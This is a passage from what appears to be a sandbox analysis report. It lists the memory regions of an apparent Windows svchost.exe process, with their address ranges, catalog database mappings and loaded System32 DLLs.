"private_0x00000000018d0000" filename = "" Region: id = 4610 start_va = 0x19d0000 end_va = 0x1acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019d0000" filename = "" Region: id = 4611 start_va = 0x1ad0000 end_va = 0x1bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ad0000" filename = "" Region: id = 4612 start_va = 0x1bd0000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 4613 start_va = 0x1cd0000 end_va = 0x1dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 4614 start_va = 0x1dd0000 end_va = 0x1ddffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4615 start_va = 0x1de0000 end_va = 0x1deffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4616 start_va = 0x1df0000 end_va = 0x1dfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4617 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 4618 start_va = 0x1f00000 end_va = 0x1f0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4619 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4620 start_va = 0x1f20000 end_va = 0x1f2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4621 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 4622 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 4623 start_va = 0x2200000 end_va = 0x220ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4624 start_va = 0x2210000 end_va = 0x2210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 4625 start_va = 0x2220000 end_va = 0x222ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4626 start_va = 0x2230000 end_va = 0x223ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4627 start_va = 0x2240000 end_va = 0x224ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 4628 start_va = 0x2250000 end_va = 0x2250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 4629 start_va = 0x2260000 end_va = 0x2261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 4630 start_va = 0x2270000 end_va = 0x227ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4631 start_va = 0x2280000 end_va = 0x228ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4632 start_va = 0x2290000 end_va = 0x229ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4633 start_va = 0x22a0000 end_va = 0x22affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4634 start_va = 0x22b0000 end_va = 0x22bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4635 start_va = 0x22c0000 end_va = 0x22cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4636 start_va = 0x22d0000 end_va = 0x22dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4637 start_va = 0x22e0000 end_va = 0x22effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4638 start_va = 0x22f0000 end_va = 0x22fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4639 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 4640 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 4641 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 4642 start_va = 0x2600000 end_va = 0x2936fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4643 start_va = 0x2940000 end_va = 0x2a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 4644 start_va = 0x2a40000 end_va = 0x2abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 4645 start_va = 0x2ac0000 end_va = 0x2acffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4646 start_va = 0x2ad0000 end_va = 0x2adffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4647 start_va = 0x2ae0000 end_va = 0x2aeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4648 start_va = 0x2af0000 end_va = 0x2afffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4649 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 4650 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 4651 start_va = 0x2d00000 end_va = 0x2d0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4652 start_va = 0x2d10000 end_va = 0x2d1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4653 start_va = 0x2d20000 end_va = 0x2d2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4654 start_va = 0x2d30000 end_va = 0x2d3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4655 start_va = 0x2d40000 end_va = 0x2d4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4656 start_va = 0x2d50000 end_va = 0x2d5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4657 start_va = 0x2d60000 end_va = 0x2d6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4658 start_va = 0x2d70000 end_va = 0x2d7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4659 start_va = 0x2d80000 end_va = 0x2d8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4660 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 4661 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 4662 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 4663 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 4664 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 4665 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 4666 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 4667 start_va = 0x3500000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 4668 start_va = 0x4500000 end_va = 0x470ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 4669 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4670 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 4671 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 4672 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 4673 start_va = 0x7ff6c7f10000 end_va = 0x7ff6c7f1cfff monitored = 0 entry_point = 0x7ff6c7f13980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4674 start_va = 0x7ff84dbf0000 end_va = 0x7ff84dee8fff monitored = 0 entry_point = 0x7ff84dcb7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 4675 start_va = 0x7ff84f920000 end_va = 0x7ff84f938fff monitored = 0 entry_point = 0x7ff84f924520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4676 start_va = 0x7ff84f980000 end_va = 0x7ff84f997fff monitored = 0 entry_point = 0x7ff84f982000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 4677 start_va = 0x7ff84f9a0000 end_va = 0x7ff84fb21fff monitored = 0 entry_point = 0x7ff84f9b82a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 4678 start_va = 0x7ff850220000 end_va = 0x7ff850242fff monitored = 0 entry_point = 0x7ff850227a30 region_type = mapped_file name = "cryptcatsvc.dll" filename = "\\Windows\\System32\\cryptcatsvc.dll" (normalized: "c:\\windows\\system32\\cryptcatsvc.dll") Region: id = 4679 start_va = 0x7ff850250000 end_va = 0x7ff850262fff monitored = 0 entry_point = 0x7ff850251450 region_type = mapped_file name = "crypttpmeksvc.dll" filename = "\\Windows\\System32\\crypttpmeksvc.dll" (normalized: "c:\\windows\\system32\\crypttpmeksvc.dll") Region: id = 4680 start_va = 0x7ff8502a0000 end_va = 0x7ff8502b7fff monitored = 0 entry_point = 0x7ff8502a7a00 region_type = mapped_file name = "cryptsvc.dll" filename = "\\Windows\\System32\\cryptsvc.dll" (normalized: "c:\\windows\\system32\\cryptsvc.dll") Region: id = 4681 start_va = 0x7ff852040000 end_va = 0x7ff852087fff monitored = 0 entry_point = 0x7ff85204abb0 region_type = mapped_file name = "wkssvc.dll" filename = "\\Windows\\System32\\wkssvc.dll" (normalized: "c:\\windows\\system32\\wkssvc.dll") Region: id = 4682 start_va = 0x7ff852610000 end_va = 0x7ff852624fff monitored = 0 entry_point = 0x7ff852613460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 4683 start_va = 0x7ff8526d0000 end_va = 0x7ff852738fff monitored = 0 entry_point = 0x7ff8526ebb10 region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll") Region: id = 4684 start_va = 0x7ff852740000 end_va = 0x7ff85279ffff monitored = 0 entry_point = 0x7ff852760fc0 region_type = mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll") Region: id = 4685 start_va = 0x7ff8527a0000 end_va = 0x7ff8527a9fff monitored = 0 entry_point = 0x7ff8527a1840 region_type = mapped_file name = "dnsext.dll" filename = "\\Windows\\System32\\dnsext.dll" (normalized: "c:\\windows\\system32\\dnsext.dll") Region: id = 4686 start_va = 0x7ff8527b0000 end_va = 0x7ff852816fff monitored = 0 entry_point = 0x7ff8527b63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4687 start_va = 0x7ff852820000 end_va = 0x7ff852869fff monitored = 0 entry_point = 0x7ff852830100 region_type = mapped_file name = "dnsrslvr.dll" filename = "\\Windows\\System32\\dnsrslvr.dll" (normalized: "c:\\windows\\system32\\dnsrslvr.dll") Region: id = 4688 start_va = 0x7ff852880000 end_va = 0x7ff85288afff monitored = 0 entry_point = 0x7ff852881d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4689 start_va = 0x7ff852890000 end_va = 0x7ff8528a9fff monitored = 0 entry_point = 0x7ff852892430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4690 start_va = 0x7ff8528b0000 end_va = 0x7ff8528c5fff monitored = 0 entry_point = 0x7ff8528b19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4691 start_va = 0x7ff852960000 end_va = 0x7ff852997fff monitored = 0 entry_point = 0x7ff852978cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4692 start_va = 0x7ff853260000 end_va = 0x7ff85328dfff monitored = 0 entry_point = 0x7ff853267550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 4693 start_va = 0x7ff853760000 end_va = 0x7ff8537d9fff monitored = 0 entry_point = 0x7ff853787630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 4694 start_va = 0x7ff8537e0000 end_va = 0x7ff8537f5fff monitored = 0 entry_point = 0x7ff8537e1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4695 start_va = 0x7ff855480000 end_va = 0x7ff8554e3fff monitored = 0 entry_point = 0x7ff855495ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4696 start_va = 0x7ff8556c0000 end_va = 0x7ff855787fff monitored = 0 entry_point = 0x7ff8557013f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4697 start_va = 0x7ff855790000 end_va = 0x7ff8557f0fff monitored = 0 entry_point = 0x7ff855794b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 4698 start_va = 0x7ff855d10000 end_va = 0x7ff855d20fff monitored = 0 entry_point = 0x7ff855d13320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 4699 start_va = 0x7ff855ee0000 end_va = 0x7ff855f9efff monitored = 0 entry_point = 0x7ff855f01c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 4700 start_va = 0x7ff855fc0000 end_va = 0x7ff855fe8fff monitored = 0 entry_point = 0x7ff855fcca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 4701 start_va = 0x7ff857c10000 end_va = 0x7ff857d95fff monitored = 0 entry_point = 0x7ff857c5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4702 start_va = 0x7ff857da0000 end_va = 0x7ff857dbbfff monitored = 0 entry_point = 0x7ff857da37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4703 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4704 start_va = 0x7ff858160000 end_va = 0x7ff858209fff monitored = 0 entry_point = 0x7ff858187910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4705 start_va = 0x7ff8586f0000 end_va = 0x7ff858713fff monitored = 0 entry_point = 0x7ff8586f3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4706 start_va = 0x7ff858890000 end_va = 0x7ff858983fff monitored = 0 entry_point = 0x7ff85889a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4707 start_va = 0x7ff858b00000 end_va = 0x7ff858b0bfff monitored = 0 entry_point = 0x7ff858b027e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4708 start_va = 0x7ff858d00000 end_va = 0x7ff858d33fff monitored = 0 entry_point = 0x7ff858d1ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4709 start_va = 0x7ff858e50000 end_va = 0x7ff858e6efff monitored = 0 entry_point = 0x7ff858e55d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4710 start_va = 0x7ff858fc0000 end_va = 0x7ff85901bfff monitored = 0 entry_point = 0x7ff858fd6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4711 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4712 start_va = 0x7ff8590d0000 end_va = 0x7ff8590e6fff monitored = 0 entry_point = 0x7ff8590d79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4713 start_va = 0x7ff8591f0000 end_va = 0x7ff8591fafff monitored = 0 entry_point = 0x7ff8591f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4714 start_va = 0x7ff859230000 end_va = 0x7ff859250fff monitored = 0 entry_point = 0x7ff859240250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 4715 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4716 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4717 start_va = 0x7ff8596f0000 end_va = 0x7ff8596fffff monitored = 0 entry_point = 0x7ff8596f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4718 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4719 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4720 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4721 start_va = 0x7ff859850000 end_va = 0x7ff859a16fff monitored = 0 entry_point = 0x7ff8598adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4722 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4723 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = 